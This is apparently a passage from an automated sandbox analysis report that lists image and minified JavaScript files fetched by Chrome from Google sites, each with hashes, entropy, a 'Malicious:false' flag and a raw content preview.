                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:MbmhxRf+lLLWlUHEzmF34N/17aVYbD0e3XkNn:xjRf+lLtHkA4N/3bpXkNn
                                                                                                                                                                                                                                                                                          MD5:14F084CA15736D15FA5EC5C9837DBC85
                                                                                                                                                                                                                                                                                          SHA1:FF0E6CDA5F176980392DBB129BAF01B83BB7A93B
                                                                                                                                                                                                                                                                                          SHA-256:9F7B4CDAC666C7B90AF3F5C86D4FA07E1B5B0DC98E283750983709CF6B3B3BD9
                                                                                                                                                                                                                                                                                          SHA-512:D11C0784B136980017D2A3E511C01FECA6CE7C882436E81DAA10043C60300BC1CCE28D69CF2C13D0723CC97D7A3C7DA4E11C02A35475F19523E4B78695871BE6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/8bC8ZC9RQ_cJj5lSa8LjCfRClGeSyp4SkN72C0tMSUIqGPVjEpHeUDfAScLNKy82MiXWLBlkpMl4FhJGrGRDhzHxOoXq5v-QSt-rvg=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....gAMA......a.....iCCPicc..H..Vy<.k.~...}....F.0...N.13..`..&.p"I..9.:tZ.."-.........".......}...]....{...~..~.x/..c......H......f......E.....4....so........wa-.n_.......?B.....<P.6.=..](......>...7....(A...1..iL..1...>..H...;..%(.MJ....T...^..?.x...i..).b.z.I:..Y"i.Yz.:'M(.y(..$....Y./....Z....z..X...0-....d6'...a'K...~.9.w..Y......0sN.H7, .Y@.*@...#.....8.....@ ..Q`5...... ..- ......T.Z...A.8...Yp.\.7...............!..CT...@Z.>d.YB,...B.P....C.H..@[.B.....F.W..t....A..!h.z.}.....a...^..`W....W..p:...w..p=|.n./.7....~.O".!#J.6.DX.;..D#q.... .H=.t"=.=D..F>cp....ab.0>.0.....).Ta.b.0.1.0C...w,...5..c}...xl.6.[.=.=...}...~..pJ8C.-....K......Zq].>.0n....M..@<./...+.....w.#.O.2A.`I."D...\B9..p.p.0J.&......@"...XLl v.o.G..$y.!..JJ$m!U.ZHWH...d2Y.lG^N.7.+.....C........."....tQ.S.S.T...5.*..6R/Q.Q?..d.d|e.2.d.e.d...%.....]'[.{R...k9......[n.\....~.Iy...|.|.|.|..u.1.......W!O..%.a.B...8.........G7......_...E......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8202
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.924938881114943
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:fWwgu1h/+gZfItYwTXT1jspWThlUWtIAAUd2EJl5pt2bdsQ/Oan4kn:fWwgu1h/NKtYwtrThlUWtI0d2IlTtodJ
                                                                                                                                                                                                                                                                                          MD5:9E3FEC2B56648337C12D9A5B8751D1D1
                                                                                                                                                                                                                                                                                          SHA1:40BD00EDB5F2CC397FD9C03D1D856565D96ACBAB
                                                                                                                                                                                                                                                                                          SHA-256:54CA1AC6E82AC6D2F1B1BC35BBD295B918D7E4435E62BDBF89544E78BF906209
                                                                                                                                                                                                                                                                                          SHA-512:6F476463A53F9409FFE5AA1779CE2D035EE7CA902BDCE1AF752971681B1AFE41FCCB77EBE0DB3085451C6C9FA97B2CDC66A72AEE39AE8C1AD6E42E7A89D3F539
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF. ..WEBPVP8L..../..?..8....../.3.4.6....K...=VM.......x.e...&@.......s.v.....{].......S....].........t..j..4...l.j[K.7..X..z.o..l.......Q....5._..........|.'........w.........6....._*..mC.......I9...oI.)...I....:.J..}..bI.....o......O.. .wwEUs).....v..c%.j..[.|.b..Q7....r.h..V5...{.KL.Gw..4.hk.sM.[Po....d{.x.\....B._.....e....zAU.|.._.=w.../d.........M....j..{.5.....W..c.^...S.hI.....QU5Z.|..k......UU..N..U...!.K..+.)....).....F/.b...B.&..._._...y^1........w.E.A....R....w.BU.)l...%.......x....".d........{...{Jz~.......d-......E6g<..;h.DU5..L.x.R...3.......fK...{VQ.xZ.G.......of.-.y&..... ..c.h8I....K...._.r.....*\7!.j.+Q.......X.....e.$..7...M.ho..j..Z..........y#.....z.C..P.FU..*7...f.!...W..^k%.5...aC,e...w9x~i.c9d....Z</.....1F..l..|..Gh.>..T..^n.!m..Hf..._.E6G({r..j1$C.J.B.NU..w..h%..%x...Z.I...........7.....FV\...1s.X^..o....W..Wnn...k....=j/.s.@Z...iNc........9-.-..Y...|....V...iA..+rA..c4'....:..i.Y.,[..(....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x394, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):48948
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973028110004557
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:+2p0JZFC/8vThHIGeAnRrJblgo45z5HmtOf3Ug/f01EsBomZUA+xPrVCtni7:+2pq4/8vpIGe8R1bE5lmofb/fjAJZMQY
                                                                                                                                                                                                                                                                                          MD5:2E26A6A5B8434AC1FBDA95E7BB83F4CA
                                                                                                                                                                                                                                                                                          SHA1:12AD1D1066FF1750A63B6F408D795BABD7658724
                                                                                                                                                                                                                                                                                          SHA-256:0DC2EDD2A7A79A38A7D6400F390A54BA1A4DE1F8F34D1F400AB5A65F163B0861
                                                                                                                                                                                                                                                                                          SHA-512:46FEF40391FE65C450D0DD417DA10B0083EEC23EB8186AD06036BCB549B3F9187940D51ADA87DC1165B461100241181F11AFBEC0DA2FE8C7C4218C7F84C8DAA6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/55/09/cf4a609c40d39a37d83b2458de52/monarch-2023-kw-hero-crop-width-1600-format-webp.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................J..........................!.1A.Q"aq..2...#B..R...$3br.4CSs...ct..%....DT.................................<........................!1.A."Qa.q...2..B.....#Rb.r..3................?.C.FH......p.....Q.I.k_.....y../[.(.ic.=].Ltd.g...-QP..=...5.u=c..w..oCt@>M.g..^.........%..l..0a.*._....R......x.Y...{\C{....>.v...I?..).....'.e.3......l..g.4v.......Z6.d...*#F3.S_.c...3=..S`...,.....7.vN].........<3.NK-(..[~..i.v....lh..Q..h....BH..p.V..i]s.Yz....J9S.c.B.VzI@*Mv.E.\...;.....}..L.".T....S....y..u'(z...X...>U...i....S-.yKHn. &E.....#...j".5...D..C)yU...#.q.......C....O.).I.).x.]K.0./M..!J..,.;(b.....H$(...".n).WtU..7R....R.s..*...5.0.&..W...l.....<!x.Ns.._.{...m..&$.#.=jwr..u.8$'-.Np8S...qK..kE...[O..O`vR....A.CSQ.<..p.Q..+..f.*.;.G.N..V.r.s.xU.....5..P*...P{...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (440)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):565
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.285443873712561
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:PI8I5wmhO+rYyROdpjdnFe9BjEHUh1tnciaYdn0Fxy:PjIZOAGZFoBZtnYm0Fo
                                                                                                                                                                                                                                                                                          MD5:69F50E2C8B310E16F453FAAD4465BDFE
                                                                                                                                                                                                                                                                                          SHA1:B2C7E5BB0609E9F9B4DD212744DAE59D21FD9ECE
                                                                                                                                                                                                                                                                                          SHA-256:0276E4F710ACA35AACED49D17FA17ECEB886511EA9DDE180721789217D89D8B7
                                                                                                                                                                                                                                                                                          SHA-512:C92E9F58B73117FF95BE39DB033E67092486DFB7D85F2EBC63C4AD7BAD563230D1BED36ED9A47546B6BC88E4F7AA06EA13916F664B15103FBF2AB217B75FCEB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/IFunn9hk.min.js
                                                                                                                                                                                                                                                                                          Preview:import{o as u}from"./0XPwTFcg.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */function s(e,l){return u({descriptor:n=>{const i={get(){var o,r;return(r=(o=this.renderRoot)===null||o===void 0?void 0:o.querySelector(e))!==null&&r!==void 0?r:null},enumerable:!0,configurable:!0};if(l){const o=typeof n=="symbol"?Symbol():"__"+n;i.get=function(){var r,t;return this[o]===void 0&&(this[o]=(t=(r=this.renderRoot)===null||r===void 0?void 0:r.querySelector(e))!==null&&t!==void 0?t:null),this[o]}}return i}})}export{s as i};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (524)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24979
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.394506157479552
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:fOKMUYsCiwPT4C6CjFMBF/rRMqrDxNBphx5kcIeGT0JJqY0nGPxrGCvqIGcQH0xG:eTjqMWkO0Uzyvh5E1I
                                                                                                                                                                                                                                                                                          MD5:2B04C85164506EAE638E22B164F1E546
                                                                                                                                                                                                                                                                                          SHA1:78749945B89716C84F6AA16408931A20D1026F7E
                                                                                                                                                                                                                                                                                          SHA-256:76DCB453AD74580FDA5850BF4D222E3FD237D1A0118B3A54898E225FB555D573
                                                                                                                                                                                                                                                                                          SHA-512:A587B6BE0D983044FA522AA5EE34EE53C142E3F6081C6A2D26DD473A91E89E53C4B2498005222E4BFB50A59F9912BB10660C469524D3C553DDDF635A04480BC6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{._.L$c=_.Ed("P10Owf",[_.gq]);.}catch(e){_._DumpException(e)}.try{._.w("P10Owf");.var GD=function(a){_.A.call(this,a.Ma);this.ka=this.getData("cmep").Kb();this.Ob=a.service.Ob;this.data=a.Td.tda};_.C(GD,_.A);GD.Ga=function(){return{service:{Ob:_.At},Td:{tda:_.mD}}};GD.prototype.wa=function(){this.Ob.ka().oa(this.getRoot().el(),1).log(!0)};GD.prototype.ta=function(a){a=a.data?_.Rb(_.mD,a.data):new _.mD;M$c(this,a)};GD.prototype.oa=function(a){M$c(this,a.data)};.var M$c=function(a,b){var c;(b==null?0:b.Ju())&&((c=a.data)==null?0:c.Ju())&&(b==null?void 0:b.Ju())!==a.data.Ju()||a.Ob.ka().oa(a.getRoot().el(),2).log(!0)};GD.prototype.Ha=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);_.nf(document,_.Uxc)};GD.prototype.Ca=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);if(this.ka){var b;_.nf(document,_.Txc,(b=this.data)==null?void 0:b.Lc())}else _.nf(document,_.Sxc,this.data)};_.L(GD.prototype,"kEOk4d",function(){return this.Ca});_.L(GD.pro
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2406)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):78365
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.456753311036989
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:o/oPKW2/xQEiuVQf4bLR5dz34pkpZZvqxdESTsBKX4cg6KlJHkOV5FdaJC03Xu2i:uoPK//xQEiuVQf4btr32MZdqxGSgBKXQ
                                                                                                                                                                                                                                                                                          MD5:9E43F550A52998CA7A0FD723D116582E
                                                                                                                                                                                                                                                                                          SHA1:C6E39D9DFD56C38AA062CACF979D690C44E03C0F
                                                                                                                                                                                                                                                                                          SHA-256:311E9E8A1ABDA5299C796E9DE880B4589FC5D52C72C0317DC5FF789B7929066F
                                                                                                                                                                                                                                                                                          SHA-512:F759B63313B11E34815FE52186D31B6F1C9DC7B4A9D7D5425B5BF3048F5C005C85EFC044C342EF8B8A2B068FAE418EC0F44BEC148B59A29E2F40354DCB2F5C57
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:google.maps.__gjsload__('map', function(_){var Gva=function(){var a=_.dr();return _.gi(a.Gg,18)},Hva=function(){var a=_.dr();return _.H(a.Gg,17)},Iva=function(a,b){return a.Eg?new _.cm(b.Eg,b.Fg):_.dm(a,_.lr(_.mr(a,b)))},Jva=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Kva=function(a,b){const c=a.length,d=typeof a==="string"?a.split(""):a;for(let e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return e;return-1},Lva=function(a){return new Promise((b,.c)=>{window.requestAnimationFrame(()=>{try{a?_.Km(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attempt.")):c(Error("Error focusing element: null element cannot be focused"))}catch(d){c(d)}})})},Mva=function(a,b){a.Fg.has(b);return new _.gra(()=>{Date.now()>=a.Ig&&a.reset();a.Eg.has(b)||a.Hg.has(b)?a.Eg.has(b)&&!a.Hg.has(b)&&a.Eg.set(b,"over_ttl"):(a.Eg.set(b,_.Dn()),a.Hg.add(b));r
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4066
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.926723169206676
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:AokAGwRQ/g+rwCoqz/ECXKIb+m+qF8piSDM366vyf:AoTGwG/nrDv3bTl1yf
                                                                                                                                                                                                                                                                                          MD5:BB7173B2DC2B06268760ADBDD2E02967
                                                                                                                                                                                                                                                                                          SHA1:DEA468D477B7A1A2CF1FEFBC7BFB24E9BDC037A4
                                                                                                                                                                                                                                                                                          SHA-256:830827B9BB0A261C1AB505DC61917202683E55C9A94FE3DB743C38172308B4DC
                                                                                                                                                                                                                                                                                          SHA-512:6279A7185FBD7F0DC996B99D37E78616A5FBB4E008C7A6B3E79C5B73B9529A999DB6A1B7D65E4C4031E9B8DA03FA9EB00F0BB303CD9E9CFF4FADB411F88215F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............ALPH......Em.!I....m...3k.m..w.l.......:'*+.......!.m#I...F.....'.......f..G^|..W.\W\q.E...c.......P[..~Q.fV.._>.D.._ r=......v..]`>.V.kVd..9..z.X&..?..I[......<.".o........}TSD..`.o...._+.....+d...&.|y...z.l..... ..2.W...._a(<-w.*....@ G~.\t..z.|..n|...b.)~.t<5.bk...vz......)..oM.c.=c..BQ..sG..|....).7....~.g....$.@.XS......_..;^6........2~.+~D...B...\9{..yQs..M.........{K..}..5.P....C8/zn.t..-.%`....w....}).X.k....-f..i.i..T.s..-........MV.6.2P.f...e....}.$e.o{.$......_.G..."}...R...l....~...N.V.M.....[n..v7..Q.G."j..(..Ni.....I...{...[u.....J{_.;~.?F4..$. ~.%...P..K..o..b..S._..B....j....y.R..u..|4..r.ftR..R.Lh.............W3...C...W3.KX.....W...cB9.T.._..k..W...%..W...j.>~..M..m..h..d.....og....y.,.......o.E#..>$......Q!.{..863...OP...X........B.noM.....o..3...L.......e.jg04..~.C..4O..............8x6A.;05+.(.........s;.C.8......_%....o._.~+...$.(~.....&..p?.[...QQ!..lp..Y....k|......2.g.Us..e.&
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3209
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8921258196992765
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:5RB7iIwmQKoPlz0e1Kn01drNGWMnkDWPGn5TTIQ2:PB7iIwxK+rKkBWaTIF
                                                                                                                                                                                                                                                                                          MD5:5E3221E1632DB15264647B64C5839670
                                                                                                                                                                                                                                                                                          SHA1:7999686FCC63A1545DF4CAC5E7B310069F5BC12F
                                                                                                                                                                                                                                                                                          SHA-256:87AE827869717F280B3C24642C68AC1C2E66A3821D6D2AD7CC467DA8D2A3CACC
                                                                                                                                                                                                                                                                                          SHA-512:10DE0C952BF5404939AB8594116338FDCDABCD5B4BAB0394C5E3FDD2E015E6CA25DB1B6CB3AF4191159EE716CA8236F7D915AEFE2C79B11F43720782A518A479
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....@IDATx..yl.....MN.A.p.S!...8... T.B[...x.d..(.hI9...E...J..R.. J.....8).SDQ.........g}...#....z.u..}..&~.....~....{.yo....h4..F..h4..F..h4..F#.....@..$.l....$..L....[&..x.+...'o.XX.!......o.l.....Ck..&...c..8.B3..../%m.5......t....Ip....y..I.%.I*...e5 d5@n.0..!..}.'Z.....P/..J..4.k..~..n.$.RP..f....K.rG.v_T....c...........7.......X.(#....L4.\E...O..M.J.q....#]`....@....X..nC@.b.1......X..1......=e:V.W.a......}Ib.Y!...4..8..H..g.F#rX\D.M....,M`..W.{...[...,d.0l.9...)E`......a..B.9.9....t...'+._..'/r..u..|...T.....9.}..Ih.1..L..W.x...... .....D.s..^....c.2...1...<Im9..W.].1....ZH`..%.!.PXxE.E..a...d...v).(...*28.%._J........lH9d.^$.._U..c=(.).....d6$ .....^..../...#G.9..c.....h..\'w..{=........3K...l.....(h.....S.a.....i..1.P.O.?A.Q......R%..e.RxQJ@)r_F..@zh.m...^.Nl..}....q.t./.r.....R].Rd...s1....}pd.;.~..;.../....f...YS?..$.I.D.".x.t..."$......-.wchx..*.y~..e8.Sf....9.;....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5268
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.934303412189919
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:OoDKfJfSWvT1aeJ7xum8IjHpOffBdJxHEU72GSmeh5XrHfhsvADZ8Ym71:O6KfTvTAeE8Jg/UkefJsCQ1
                                                                                                                                                                                                                                                                                          MD5:ECDB64DF3C43153CC2EF90DD9EBFDC9C
                                                                                                                                                                                                                                                                                          SHA1:3CE421421E02252E69F0CF5C8CE45D17CF46CD3F
                                                                                                                                                                                                                                                                                          SHA-256:7714E183A0DC5240E3DF84F877EEFA7CEE1AE6370AE865F124E982952FC9D01F
                                                                                                                                                                                                                                                                                          SHA-512:7C51A4C7CA03147022512450E526E5969EB8473AB0BFA2CA108B907115630996B130F60F90DAE30DBD23E89727B142C201A4418F5526AC35DAB65F2FCBE57C6B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/flHLQ2o9o8gGi2lHhT5QeZT3fC04iz-gTgOhgTDMgP9l2iiXAWFrvEiPKPGcQ1hgVNBJ2j8dpa-XpJ3rGkIUxBXh63rtfdImVnTjMA=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....KIDATx..]i...u...mf.M+..Y...J..&....`c;..d3!.`7U@l.\Hb...Wab.Z0...")..'..0 (. c.,6.`..!..7o.{....7.....L..}U.4..[...s.m`.S....0.)t..J..gMJ..O..R,@ .$...)k....9HS...+7(..4.0....G'x.d"V.....,...39o.`....A...X.c..5d..s]...'..lfn\Hue,%......}.\|../......=..w.r....{..............hT..m.....C....x&..*..........t...Q.B,......C....X!...!3(.-...%D:...q.3v....u.Bu.{.u.....<z.#.:2.+.....h. Z{.G._..F....;...)..9.....1z.............(PJ..;o.`....d.x$v.........Y......I7.....oP...........C.{.#.&.HVJ0.9...h.P...+.O-D4.6.5{..pc....j.`)....L....}D4.6..e$+W.."..........w.?t].....!8.....a..a ..........R.".%........E.%!.9..h...........i..J*......0..&h...W.|x....z...Ew..Bn...n....51=cj.W......h...u......q...kbf..V....M...U...'...V...&f[.X3C....iC"F.b%..b.F.....x@.b.....5....7u}NV..dY.(.d...j.s..t..&.,K..K....jT,.....$y.7.&hfJ......]]Bu......U5z#j.U..\k..g.....pS...A..Aea@$rU .}4.....z,...._.^..A)..e....H.....>..(.M
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3266
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.852627538876169
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:qt1HKAKySfASN3pxt6fImZlHjlBIsAyZkGpcjT:W4AKFo60gsAIk+cjT
                                                                                                                                                                                                                                                                                          MD5:F68A96B7A1C51CF5159DB73E22597AF4
                                                                                                                                                                                                                                                                                          SHA1:9C7B49A43FEE2EDA51CB554B3D7F6999386C2B76
                                                                                                                                                                                                                                                                                          SHA-256:3E64CB5E301757480594DBF1D52CD5A5129600C0216B526E190A25C1D4263136
                                                                                                                                                                                                                                                                                          SHA-512:FCDF61A2C62B35C5E511ADF2CD7E77B84C76B38F8242CCB19BBC788839C5AE624CF062F2D9279DC46788C4A76A988FDDA1936B53E8743BA4B9E1823D2E2E408E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................x.x..".........................................B..........................!1..."AQ2aq.....#3Br..$CRbt5S...%c.....................................7........................!1..AQa"Bq......2br....#34R..............?..:R.!)Q.f.)....]<..]..-.......1.(&..K6.......;8.Iwr=.H/ku*........i.H....b.kF:E....Z....i..ox..M....d.H.......k...d.4.jM...l..x7.YYe*..7.@.8..mmn..M.[....}..:#..6..76m......-.|...P......\>l.&....s....W.._ZZv.3e{ms.%c.L.?."D.....sO.u.G#$n..#.7..M*3S_S.JR.%A..4!a.6..t.h..{..6...../h....'8#.joX{ej......'.....T.2?.....o..V.';....$nb..H.W......8,...J......$....3...E...y\.+..7.y].v...O._*T...q.T..R.>...s.W.R...(Jf..JR.!~..(...NU.u#...0#...o..l]kO.I&.|..wd..x.\...i.8.+...[.R..v./-=..q.*.:...M.;~.....yH..DR.....`r..ES.WZ..,.A.aym!?.&M..qB..j.*.......k.........#1....9.tSJR...*.....A.P.O3\.gs....]...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9634
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.970882451285495
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:s5l+dmg48Smk2ajd2OjX4vFCaIB7xVXJPSShfEoXnEGS1:fdmnL2ajd2GXwZC7/BSSFEoXnEJ1
                                                                                                                                                                                                                                                                                          MD5:15975876928EB5BE40E85FC7739D6C8A
                                                                                                                                                                                                                                                                                          SHA1:9E985B9132FDACBCB8ADC5209BA66EC6E607E35C
                                                                                                                                                                                                                                                                                          SHA-256:71185299A1C6F47CF809BC15684AE61ABFC9768CD49D2ABBAA2E09FF14928E29
                                                                                                                                                                                                                                                                                          SHA-512:5EDEE2D2E56638BB5C32FFDA948893085DFC272CBD11AD9827EFF08788876C41CE6FA305795B935619F7992E7E3687C7AF7480ED143775E29FA42A7ED47DE205
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx..y.\U..?..[U.d.w..A.C..$......C....qx.q.U..e{...dT..Qq.....}......A.L..E......K.kuwuW.....q../]..'?."....w....s.-8L..0...t.... q...i......M."..a....I/..V. .v@.....~.-B.7c...V..V....-..Z1&.`!..2..S...v`....r../....4.........[.R...;.x...s.L..3S.T0..C4.0`..B..D.2.@$..Xl..zT..F,./.....y.....N@...HO....).....V.....Tn*G.B.1.....AoiE..B......C.y_._...........r.r\.j.:.7..s..(f"E..PB...".\.J.)....hD.l..s.m.2...;../}......:$...S.R_...$fr..."...`j..D..mGu.1.5..h..5..9k..B.....gk....!.p.M.m.S.;.D.(54.....RM...W.8Z&.j...`!...EK.g....T....!.p.-.^o2....c......+..LS.t.:J.eau,....H....K.A....7t.....3..}.E).HQ.5KM7.p.2.Z.`-^.5{......._...:#3C......;.......8...F.8.S)D<..h..9.w}.[.Vg..t....S'.L.....R=1.Hl..M.......z.Z#g.!.xI.hi...+..mu..GU.]s....F./e..Z.''@Z."n@.j.G!....)2.v,..._....i.oUX8..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x393, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107565
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.975686549609348
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:szuwrb3dxaLYf2wO7PTnfulHWIGrrwL4W4UBgXJsF/pT5JI9Tu2J1KKeNlYWocq:sTQNLWlHWVS4W4YgXyFRTU997KK025
                                                                                                                                                                                                                                                                                          MD5:70A25E317D38E5F5F53DAE77985AAB28
                                                                                                                                                                                                                                                                                          SHA1:B044DD95D7212EB3715818AC7BA1FD2DB2ECDCEF
                                                                                                                                                                                                                                                                                          SHA-256:258AE61DAEDE0E2BE36C673428CD260EB399D7F812F5A13202B9C491141883CD
                                                                                                                                                                                                                                                                                          SHA-512:A8B1809A408E09EA548B6FC4666BC247C097BF6FF4BCF129F16C030781F545E6B7F6633C497B7F682D5E89EE12870F0B119DAAE566ED0212939DF34CA30E2A97
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................[.........................!..1."AQa..2q#B....3Rbr....$C..4s....St......%5cu..D...Td....U....................................C.......................!..1AQaq.."...2....B.#Rbr....$3....S%C................?...........o...F..Nh..s...$...,{..94..'_M..A$xt...`..`.>d._...[..iX..hp.t..7.......B>G....m..{.y.a.....?u.o...?u..xxU.R.. ...k.....o..x..k5J..7k..m..]......Xs.<.Y%H.J...2y.(tX... ..A=."....Y.x.n.4r......D.lF..u6.7..iBU...Qr.F.."M(...8...1....PL..@..x.....$.;.`/s....dK...T...P.....Q=..Uo.P.$....RQ2.:..P....P.(.o...,.nN...._...}l..,.S..............2...M.^.....5.W... ..P..'T.(.....@h.....H...v.9I..C3;.v.....x.l.......q.b.RU=,..l.6..So.....o.M\5.T........#..n>D.-.)....o.#:.e-J.u..".....Co....1.~6..?./.q..<..........v.q.G.?./...m......2J5H.(~...G..}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):52916
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
